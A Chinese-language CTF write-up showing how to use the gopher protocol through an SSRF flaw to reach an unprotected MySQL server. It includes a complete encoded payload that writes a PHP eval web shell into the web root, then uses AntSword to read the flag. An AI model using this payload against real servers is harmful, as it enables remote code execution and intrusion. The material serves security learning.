目录
GOPHER协议
GOPHER协议是一种比HTTP协议还要古老的协议,默认工作端口70,但是gopher协议在SSRF漏洞利用上比HTTP协议更有优势。GOPHER协议可以以单个URL的形式传递POST请求,同时支持换行。
GOPHER协议发起的格式
关于GET型和POST型的构造参考我得另外一篇博客即可:SSRF漏洞_貌美不及玲珑心,贤妻扶我青云志的博客-CSDN博客
GOPHER利用工具
该项目是基于GOPHER协议生成Payload,对SSRF漏洞进行验证
支持多种数据库
案例:CTFSHOW-359关
链接地址:ctf.show
该环境mysql是无密码的
(1)抓包登陆处
这里会远程请求check.php
URL解码retur1处的参数,解码结果:https://404.chall.ctf.show/
这里会远程请求资源地址,测试SSRF漏洞
(2)使用gopher协议利用工具
注意该工具需要运行在Linux系统上,并且运行环境为python 2.x,还需要有执行权限才行
(3)需要对下划线后面的在进行一次URL编码(防止出现特殊字符,后端 curl 接收到参数后会默认解码一次)
UrlEncode编码/UrlDecode解码 - 站长工具
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2561%2561%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
链接蚁剑:
读取flag.txt
